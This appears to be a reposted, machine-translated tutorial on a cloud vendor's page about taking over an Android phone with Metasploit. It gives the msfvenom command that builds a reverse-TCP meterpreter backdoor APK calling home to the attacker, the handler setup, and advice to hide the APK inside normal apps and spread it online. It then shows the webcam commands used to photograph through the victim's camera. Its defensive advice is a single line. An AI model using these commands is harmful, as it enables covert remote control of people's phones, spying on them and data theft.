Demo using Metasploit intrusion Android

Source: Internet
Author: User

Text shows how to use Kali Linux to invade Android phones.

Kali Linux IP Address: 192.168.0.112; the port to which the connection is received: 443.

One Android Phone (Android 5.1) in the same LAN

Create a backdoor program

Execute in Terminal:

# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk

This backdoor (APK) is sent to the victim; to replace the IP address of the above command with the attacker's IP, it attempts to connect to the IP when the backdoor is running.

Start metasploit-wait for the victim to start the backdoor program
msfconsole

Execute in turn:

msf > use exploit/multi/handler    > set payload android/meterpreter/reverse_tcp    > set lhost 192.168.0.112    > set lport 443    > exploit

Distributing Backdoor procedures

General backdoor procedures are packaged into the normal app, anyway is a variety of hidden;

Use the internet to distribute backdoor programs.

No more gossip, here I install apk running with backdoor on my Android phone.

Virus!!!

Control the victim's cell phone

After the victim runs the backdoor, it can use Metasploit to control him:

Use Help to view the commands you can use:

For example, take a photo with the other's camera:

> webcam_list> webcam_snap

How to prevent:

    • Do not install the untrusted apk

Demo using Metasploit intrusion Android

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.